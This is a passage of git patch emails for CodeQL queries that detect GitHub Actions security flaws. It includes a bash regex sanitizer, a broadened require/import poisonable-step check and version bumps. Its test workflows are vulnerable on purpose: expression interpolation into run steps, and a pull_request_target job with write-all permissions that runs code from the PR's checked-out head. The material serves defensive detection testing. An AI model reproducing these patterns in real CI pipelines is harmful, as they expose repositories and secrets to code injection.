$GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | @@ -623,8 +623,8 @@ subpaths | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | ${{ steps.git-commit.outputs.file-list }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index ddfa951241e3..be14d58737ee 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -13,8 +13,8 @@ edges | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | provenance | | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | provenance | | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | @@ -234,10 +234,10 @@ nodes | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | semmle.label | inputs.title | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | semmle.label | Uses Step: out [replaced] | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | semmle.label | inputs.title | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:74:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:70:75 | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | fileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:70:28:70:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:80:30:80:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | semmle.label | Run Step: git-commit [file-list] | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | From 263582c7969ede1c3d8a1022756434fe0d1054bd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:19 +0100 Subject: [PATCH 650/707] feat: Add sanitizers for bash test commands --- ql/lib/codeql/actions/Bash.qll | 23 ++++++- .../CWE-094/.github/workflows/test23.yml | 64 +++++++++++++++++++ 2 files changed, 86 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fda27732828e..7f2d4aeef9c3 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -691,11 +691,32 @@ module Bash { // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) script.getAnAssignment(var2, value2) and containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(expr, var2, _, _) + containsParameterExpansion(expr, var2, _, _) and + not varMatchesRegexTest(script, var2, alphaNumericRegex()) ) or // var reaches the file write directly // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) containsCmdSubstitution(expr, cmd) } + + /** + * Holds if there test command that checks a variable against a regex + * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]` + */ + bindingset[var, regex] + predicate varMatchesRegexTest(BashShellScript script, string var, string regex) { + exists(string lhs, string rhs | + lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and + containsParameterExpansion(lhs, var, _, _) and + rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and + trimQuotes(rhs).regexpMatch(regex) + ) + } + + /** + * Holds if the given regex is used to match an alphanumeric string + * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$` + */ + string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" } } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml new file mode 100644 index 000000000000..184bcd966108 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test23.yml @@ -0,0 +1,64 @@ +on: + workflow_run: + +jobs: + test: + runs-on: ubuntu-22.04 + if: > + (github.event.workflow_run.event == 'pull_request' || + github.event.workflow_run.event == 'pull_request_target') && + github.event.workflow_run.conclusion == 'success' + + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "doc-build-artifact" + })[0]; + var download = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{steps.setup-env.outputs.current_work_dir}}/doc-build-artifact.zip', Buffer.from(download.data)); + + - run: | + mkdir build_dir + unzip doc-build-artifact.zip -d build_dir + + - name: Get commit_sha & pr_number + id: github-context + run: | + content_commit_sha=$(cat ./build_dir/commit_sha) + if [[ $content_commit_sha =~ ^[0-9a-zA-Z]{40}$ ]]; then + echo "commit_sha=$content_commit_sha" >> $GITHUB_OUTPUT + rm -rf ./build_dir/commit_sha + else + echo "Encountered an invalid commit_sha" + exit 1 + fi + + content_pr_number=$(cat ./build_dir/pr_number) + if [[ $content_pr_number =~ ^[0-9]+$ ]]; then + echo "pr_number=$content_pr_number" >> $GITHUB_OUTPUT + rm -rf ./build_dir/pr_number + else + echo "Encountered an invalid pr_number" + exit 1 + fi + + - run: | + echo "hub_docs_url=pr_${{ steps.github-context.outputs.pr_number }}" >> $GITHUB_OUTPUT + + - run: | + cd build_dir + doc-builder push --commit_msg "Updated with commit ${{ steps.github-context.outputs.commit_sha }} From a2f162e4822182ab993a7017e1af624dc2aeb8a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 12:43:44 +0100 Subject: [PATCH 651/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a33cecb6fe03..f5f8abdce209 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.81 +version: 0.1.82 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6d1bc8634ba8..c0f849e1f3e1 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.81 +version: 0.1.82 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0157bf3297d1d2173efe9036ba6606273813d6e8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 30 Oct 2024 22:12:17 +0100 Subject: [PATCH 652/707] fix: improve JS require/import poisonable step to account for cwd --- .../actions/security/PoisonableSteps.qll | 5 +++-- .../CWE-829/.github/workflows/test29.yml | 21 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 2 ++ 3 files changed, 26 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index d446c4466410..1f3bc66bd776 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -21,9 +21,10 @@ class JavascriptImportUsesStep extends PoisonableStep, UsesStep { this.getCallee() = "actions/github-script" and script = this.getArgument("script") and line = script.splitAt("\n").trim() and + // const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs') // const script = require('${{ github.workspace }}/scripts/test.js'); - // await script({ github, context, core }); - line.regexpMatch(".*(import|require)\\b.*github.workspace\\b.*") + // const script = require('./scripts'); + line.regexpMatch(".*(import|require)\\(('|\")(\\./|.*github.workspace).*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml new file mode 100644 index 000000000000..cc7f71a7b3e4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml @@ -0,0 +1,21 @@ +on: pull_request_target + +jobs: + test: + permissions: write-all + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - uses: actions/github-script@v5 + with: + github-token: ${{secrets.GITHUB_TOKEN}} + script: | + const { + foo + } = require('./foo'); + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 35d61dac5faf..85c2529c54c3 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -285,6 +285,7 @@ edges | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | | .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | +| .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -346,6 +347,7 @@ edges | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | | .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test29.yml:14:7:21:11 | Uses Step | .github/workflows/test29.yml:8:7:14:4 | Uses Step | .github/workflows/test29.yml:14:7:21:11 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test29.yml:1:5:1:23 | pull_request_target | pull_request_target | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | workflow_run | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | issue_comment | From ebd45ace50d3daef7b0457dfdfe868b2d5d64d60 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 31 